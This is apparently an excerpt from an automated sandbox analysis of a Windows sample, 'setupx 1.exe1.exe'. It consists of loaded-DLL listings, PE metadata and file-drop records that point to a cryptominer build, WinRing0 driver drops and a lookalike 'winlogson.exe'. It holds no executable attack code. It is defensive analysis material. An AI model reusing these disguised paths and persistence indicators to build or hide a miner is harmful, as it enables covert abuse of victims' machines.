                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: setupx 1.exe1.exeStatic file information: File size 1360384 > 1048576
                  Source: setupx 1.exe1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.10.dr
                  Source: ZHKYZWVTC38PGAWGZF49K.exe.2.drStatic PE information: 0x9A21587A [Mon Dec 11 03:03:22 2051 UTC]
                  Source: winlogson.exe.10.drStatic PE information: real checksum: 0x7e7c4c should be: 0xe1f33
                  Source: ZHKYZWVTC38PGAWGZF49K.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x11c88
                  Source: setupx 1.exe1.exeStatic PE information: real checksum: 0x0 should be: 0x156ac4
                  Source: winlogson.exe.10.drStatic PE information: section name: .xdata
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CAC147 push ds; retf 0_2_00CAC148
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CAC131 push ds; retf 0_2_00CAC136
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CEDFCA push ecx; ret 0_2_00CEDFDD
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00452068 push ebx; ret 2_2_00452069
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00451100 pushfd ; retn 0041h2_2_00451101
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00451D1A push es; retn 0042h2_2_00452065
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_0045365F push esi; iretd 2_2_00453660
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CAC147 push ds; retf 2_2_00CAC148
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CAC131 push ds; retf 2_2_00CAC136
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CEDFCA push ecx; ret 2_2_00CEDFDD
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CAA775 push es; iretd 2_2_00CAA776
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04E16338 pushad ; ret 13_2_04E16341
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08AB7730 pushfd ; iretd 13_2_08AB7731
                  Source: setupx 1.exe1.exeStatic PE information: section name: .text entropy: 7.09207256696417

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
